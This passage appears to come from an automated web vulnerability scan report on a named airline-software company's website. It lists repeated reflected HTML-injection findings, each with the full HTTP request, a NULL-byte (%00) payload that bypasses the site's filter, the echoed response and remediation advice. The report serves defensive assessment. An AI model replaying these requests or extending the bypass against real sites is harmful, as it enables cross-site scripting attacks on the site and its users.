GET /home/ascend/subscribe/?%00dd50a"><a>ad2e0e8eeb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ascend Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321333; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A1%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A4%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/ascend/subscribe/?%00dd50a"><a>ad2e0e8eeb=1"> ...[SNIP]...
3.39. http://www.sabreairlinesolutions.com/home/business_issues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d1fb2"><a>4652b7d32bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fb2"><a>4652b7d32bc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues?%00d1fb2"><a>4652b7d32bc=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues?%00d1fb2"><a>4652b7d32bc=1"> ...[SNIP]...
3.40. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/fuel_management
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005ebe9<a>5d4d5d49d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ebe9<a>5d4d5d49d0a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/fuel_management?%005ebe9<a>5d4d5d49d0a=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>5d4d5d49d0a=1">fuel management?%005ebe9<a>5d4d5d49d0a=1</a> ...[SNIP]...
3.41. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/fuel_management
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0035c4b"><a>50f74342d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35c4b"><a>50f74342d82 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/fuel_management?%0035c4b"><a>50f74342d82=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321561; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/fuel_management?%0035c4b"><a>50f74342d82=1"> ...[SNIP]...
3.42. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/fuel_management/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c8fc1<a>764063527b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c8fc1<a>764063527b4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/fuel_management/?%00c8fc1<a>764063527b4=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>764063527b4=1">?%00c8fc1<a>764063527b4=1</a> ...[SNIP]...
3.43. http://www.sabreairlinesolutions.com/home/business_issues/fuel_management/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/fuel_management/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008775d"><a>c02e51ee33d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8775d"><a>c02e51ee33d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/fuel_management/?%008775d"><a>c02e51ee33d=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322245; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_distribution%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/fuel_management/?%008775d"><a>c02e51ee33d=1"> ...[SNIP]...
3.44. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/irregular_operations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004e1af<a>077d95e6518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e1af<a>077d95e6518 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/irregular_operations/?%004e1af<a>077d95e6518=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>077d95e6518=1">?%004e1af<a>077d95e6518=1</a> ...[SNIP]...
3.45. http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/irregular_operations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0059277"><a>214029d358f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59277"><a>214029d358f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/irregular_operations/?%0059277"><a>214029d358f=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322256; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/irregular_operations/?%0059277"><a>214029d358f=1"> ...[SNIP]...
3.46. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/other_airline_issues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00bf7e1"><a>9d7b30f12ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf7e1"><a>9d7b30f12ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/other_airline_issues?%00bf7e1"><a>9d7b30f12ab=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/other_airline_issues?%00bf7e1"><a>9d7b30f12ab=1"> ...[SNIP]...
3.47. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/other_airline_issues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f61d7<a>7f1e076aefd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f61d7<a>7f1e076aefd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/other_airline_issues?%00f61d7<a>7f1e076aefd=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321529; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fabout%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>7f1e076aefd=1">other airline issues?%00f61d7<a>7f1e076aefd=1</a> ...[SNIP]...
3.48. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/other_airline_issues/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ad915<a>d7416594ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad915<a>d7416594ce8 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/other_airline_issues/?%00ad915<a>d7416594ce8=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a>d7416594ce8=1">?%00ad915<a>d7416594ce8=1</a> ...[SNIP]...
3.49. http://www.sabreairlinesolutions.com/home/business_issues/other_airline_issues/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/other_airline_issues/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fe03e"><a>5df3cb060b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe03e"><a>5df3cb060b1 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/business_issues/other_airline_issues/?%00fe03e"><a>5df3cb060b1=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <a href="/home/business_issues/other_airline_issues/?%00fe03e"><a>5df3cb060b1=1"> ...[SNIP]...
3.50. http://www.sabreairlinesolutions.com/home/business_issues/revenue_growth [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/business_issues/revenue_growth
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ddcb8<a>b66fa2a9b31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddcb8<a>b66fa2a9b31 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
